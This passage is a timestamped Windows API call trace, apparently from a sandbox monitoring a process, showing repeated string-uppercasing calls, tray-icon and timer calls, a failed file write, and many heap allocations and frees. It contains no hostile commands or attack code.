lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.427] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.427] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.427] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.427] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.428] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.428] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.428] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.428] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.428] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.428] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.428] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.428] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.429] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.429] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.429] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.429] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.429] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.429] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.429] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.429] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.430] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.430] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.430] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.430] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.430] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.430] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.430] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.431] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.431] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.431] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.431] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.431] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.431] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.431] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.431] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.432] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.432] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.432] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.432] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.432] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.432] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.432] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.433] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.433] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.433] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.433] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.433] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.433] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.433] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.434] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.434] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.434] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.434] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.434] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.434] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.434] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.434] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.435] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.435] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.435] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.435] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.435] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.435] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.435] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.953] TranslateMessage (lpMsg=0x6af6cc) returned 0 [0026.953] DispatchMessageW (lpMsg=0x6af6cc) returned 0x0 [0026.953] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6aed68) returned 1 [0026.954] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0026.954] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0026.955] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.955] GetLastError () returned 0x0 [0026.955] SetLastError (dwErrCode=0x0) [0026.955] GetLastError () returned 0x0 [0026.955] SetLastError (dwErrCode=0x0) [0026.955] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.955] GetLastError () returned 0x6 [0026.955] GetLastError () returned 0x6 [0026.955] SetLastError (dwErrCode=0x6) [0026.955] GetLastError () returned 0x6 [0026.955] SetLastError (dwErrCode=0x6) [0026.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0026.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af278 | out: hHeap=0x770000) returned 1 [0026.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac670 | out: hHeap=0x770000) returned 1 [0026.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af318 | out: hHeap=0x770000) returned 1 [0026.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8893d0 | out: hHeap=0x770000) returned 1 [0026.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0026.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0b08 | out: hHeap=0x770000) returned 1 [0026.956] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af318 [0026.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af278 [0026.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae788 [0026.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae788 | out: hHeap=0x770000) returned 1 [0026.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af278 | out: hHeap=0x770000) returned 1 [0026.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af318 | out: hHeap=0x770000) returned 1 [0026.956] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af318 [0026.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af318 | out: hHeap=0x770000) returned 1 [0026.956] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af318 [0026.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b08 [0026.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0026.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af278 [0026.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af278 | out: hHeap=0x770000) returned 1 [0026.956] QueryPerformanceCounter (in: lpPerformanceCount=0x6af340 | out: lpPerformanceCount=0x6af340*=16887878782) returned 1 [0026.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0026.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0b08 | out: hHeap=0x770000) returned 1 [0026.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af318 | out: hHeap=0x770000) returned 1 [0026.956] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b08 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af318 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af278 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b58 [0026.957] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0b58 | out: hHeap=0x770000) returned 1 [0026.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af278 | out: hHeap=0x770000) returned 1 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b58 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af278 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b30 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8893d0 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af288 [0026.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af288 | out: hHeap=0x770000) returned 1 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891f0 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b80 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af288 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894a8 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab1d0 [0026.957] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ba8 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d18 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af518 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d00 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0bd0 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d60 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2b8 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889460 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889448 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af308 [0026.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889448 | out: hHeap=0x770000) returned 1 [0026.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889448 [0026.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af308 | out: hHeap=0x770000) returned 1 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0bf8 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af308 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891a8 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c20 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889418 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2f8 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c48 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889da8 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d90 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0026.958] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.958] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891a8 | out: hHeap=0x770000) returned 1 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891a8 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2c8 [0026.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4e8 [0026.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0026.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891a8 | out: hHeap=0x770000) returned 1 [0026.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7ed228 [0026.959] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891a8 [0026.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4e8 [0026.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0026.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0026.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4e8 [0026.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0026.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894c0 [0026.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4e8 [0026.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0026.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4e8 [0026.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4d8 [0026.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4c8 [0026.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0026.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891a8 | out: hHeap=0x770000) returned 1 [0026.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0026.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0026.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af2c8 [0026.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.959] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4d8 [0026.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4d8 [0026.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7ed268 [0026.960] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4d8 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4e8 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4b8 [0026.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0026.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0026.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0026.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4d8 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4e8 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894c0 [0026.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.960] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4d8 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0026.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0026.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4a8 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0026.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 